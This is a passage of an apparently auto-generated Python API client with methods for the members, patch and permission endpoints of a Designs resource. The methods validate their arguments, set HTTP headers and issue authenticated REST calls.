    :param str fk: Foreign key for members (required)
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_fk_get_with_http_info(id, fk, **kwargs)
def designs_id_members_fk_get_with_http_info(self, id, fk, **kwargs):
    """
    Find a related item by id for members.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_fk_get_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_fk_get" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_fk_get`")
    # verify the required parameter 'fk' is set
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_fk_get`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members/{fk}'.replace('{format}', 'json')
    path_params = {'id': params['id'], 'fk': params['fk']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TeamMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_fk_put(self, id, fk, **kwargs):
    """
    Update a related item by id for members.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_fk_put(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :param TeamMember data:
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_members_fk_put_with_http_info(self, id, fk, **kwargs):
    """
    Update a related item by id for members.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_fk_put_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :param TeamMember data:
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'fk', 'data', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_fk_put" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_fk_put`")
    # verify the required parameter 'fk' is set
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_fk_put`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members/{fk}'.replace('{format}', 'json')
    path_params = {'id': params['id'], 'fk': params['fk']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # The optional `data` keyword becomes the request body (None if absent).
    body_params = params.get('data')

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TeamMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_get(self, id, **kwargs):
    """
    Queries members of Design.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[TeamMember]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_get_with_http_info(id, **kwargs)
def designs_id_members_get_with_http_info(self, id, **kwargs):
    """
    Queries members of Design.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str filter:
    :return: list[TeamMember]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'filter', 'callback', '_return_http_data_only']
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_get" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_get`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members'.replace('{format}', 'json')
    path_params = {'id': params['id']}
    query_params = {}
    # Optional LoopBack filter, forwarded verbatim as a query parameter.
    if 'filter' in params:
        query_params['filter'] = params['filter']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[TeamMember]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_post(self, id, **kwargs):
    """
    Creates a new instance in members of this model.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_post(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param TeamMember data:
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_post_with_http_info(id, **kwargs)
def designs_id_members_post_with_http_info(self, id, **kwargs):
    """
    Creates a new instance in members of this model.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_post_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param TeamMember data:
    :return: TeamMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'data', 'callback', '_return_http_data_only']
    params = {'id': id}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_post" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_post`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members'.replace('{format}', 'json')
    path_params = {'id': params['id']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # The optional `data` keyword becomes the request body (None if absent).
    body_params = params.get('data')

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='TeamMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_rel_fk_delete(self, id, fk, **kwargs):
    """
    Remove the members relation to an item by id.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_rel_fk_delete(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_rel_fk_delete_with_http_info(id, fk, **kwargs)
def designs_id_members_rel_fk_delete_with_http_info(self, id, fk, **kwargs):
    """
    Remove the members relation to an item by id.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_rel_fk_delete_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_rel_fk_delete" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_rel_fk_delete`")
    # verify the required parameter 'fk' is set
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_rel_fk_delete`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members/rel/{fk}'.replace('{format}', 'json')
    path_params = {'id': params['id'], 'fk': params['fk']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_rel_fk_head(self, id, fk, **kwargs):
    """
    Check the existence of members relation to an item by id.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_rel_fk_head(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: bool
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_rel_fk_head_with_http_info(id, fk, **kwargs)
def designs_id_members_rel_fk_head_with_http_info(self, id, fk, **kwargs):
    """
    Check the existence of members relation to an item by id.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_rel_fk_head_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :return: bool
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'fk', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_rel_fk_head" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_rel_fk_head`")
    # verify the required parameter 'fk' is set
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_rel_fk_head`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members/rel/{fk}'.replace('{format}', 'json')
    path_params = {'id': params['id'], 'fk': params['fk']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'HEAD',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='bool',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_members_rel_fk_put(self, id, fk, **kwargs):
    """
    Add a related item by id for members.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_rel_fk_put(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :param DesignMember data:
    :return: DesignMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_members_rel_fk_put_with_http_info(id, fk, **kwargs)
def designs_id_members_rel_fk_put_with_http_info(self, id, fk, **kwargs):
    """
    Add a related item by id for members.

    Synchronous unless a `callback` keyword argument is supplied, in
    which case the HTTP request runs asynchronously and the request
    thread is returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_members_rel_fk_put_with_http_info(id, fk, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param str fk: Foreign key for members (required)
    :param DesignMember data:
    :return: DesignMember
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint understands.
    accepted = ['id', 'fk', 'data', 'callback', '_return_http_data_only']
    params = {'id': id, 'fk': fk}
    for name, value in kwargs.items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method designs_id_members_rel_fk_put" % name
            )
        params[name] = value

    # verify the required parameter 'id' is set
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `designs_id_members_rel_fk_put`")
    # verify the required parameter 'fk' is set
    if params.get('fk') is None:
        raise ValueError("Missing the required parameter `fk` when calling `designs_id_members_rel_fk_put`")

    collection_formats = {}
    resource_path = '/Designs/{id}/members/rel/{fk}'.replace('{format}', 'json')
    path_params = {'id': params['id'], 'fk': params['fk']}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # The optional `data` keyword becomes the request body (None if absent).
    body_params = params.get('data')

    # Negotiate the `Accept` header; omit it entirely when nothing matches.
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    # Authentication setting
    auth_settings = ['access_token']

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignMember',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_patch(self, id, **kwargs):
    """
    Patch attributes for a model instance and persist it into the data source.

    The request is synchronous by default. Supplying a `callback`
    keyword makes it asynchronous: the request thread is returned and
    the callback receives the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_patch(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param Design data: An object of model property name/value pairs
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Wrapper callers want just the payload, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already returns the request thread when
    # a callback is present and the bare payload otherwise, so its result
    # can be passed straight through in both cases.
    return self.designs_id_patch_with_http_info(id, **kwargs)
def designs_id_patch_with_http_info(self, id, **kwargs):
    """
    Patch attributes for a model instance and persist it into the data source.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_patch_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param Design data: An object of model property name/value pairs
    :return: Design
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_patch" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_patch`")
    collection_formats = {}
    resource_path = '/Designs/{id}'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # Optional request body: the partial Design to apply.
    body_params = None
    if 'data' in params:
        body_params = params['data']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the PATCH request; returns the deserialized Design (or the
    # request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Design',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_permission_delete(self, id, **kwargs):
    """
    Deletes permission of this model.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_delete(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_permission_delete_with_http_info(id, **kwargs)
def designs_id_permission_delete_with_http_info(self, id, **kwargs):
    """
    Deletes permission of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_delete_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_permission_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_delete`")
    collection_formats = {}
    resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # DELETE carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the DELETE request; no response body is deserialized
    # (response_type=None).
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_permission_get(self, id, **kwargs):
    """
    Fetches hasOne relation permission.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_get(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: DesignPermissionSet
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_permission_get_with_http_info(id, **kwargs)
def designs_id_permission_get_with_http_info(self, id, **kwargs):
    """
    Fetches hasOne relation permission.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_get_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param bool refresh:
    :return: DesignPermissionSet
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'refresh']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_permission_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_get`")
    collection_formats = {}
    resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = {}
    # Optional 'refresh' flag is passed through as a query parameter.
    if 'refresh' in params:
        query_params['refresh'] = params['refresh']
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
    # Authentication setting
    auth_settings = ['access_token']
    # Issue the GET request; returns the deserialized DesignPermissionSet
    # (or the request thread when a callback is supplied).
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DesignPermissionSet',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    collection_formats=collection_formats)
def designs_id_permission_post(self, id, **kwargs):
    """
    Creates a new instance in permission of this model.

    The request is synchronous unless a `callback` function is supplied,
    in which case the request thread is returned and the callback is
    invoked with the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_post(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignPermissionSet data:
    :return: DesignPermissionSet
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the low-level helper for the response payload only (no HTTP
    # status/headers).  Sync and async paths both return the helper's
    # result, so the original two-branch body collapses to one call.
    kwargs['_return_http_data_only'] = True
    return self.designs_id_permission_post_with_http_info(id, **kwargs)
def designs_id_permission_post_with_http_info(self, id, **kwargs):
    """
    Creates a new instance in permission of this model.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.designs_id_permission_post_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Design id (required)
    :param DesignPermissionSet data:
    :return: DesignPermissionSet
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['id', 'data']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot of locals ('self', 'id', 'kwargs'); validated kwargs are
    # merged in below and the raw 'kwargs' entry is then discarded.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method designs_id_permission_post" % key
            )
        params[key] = val
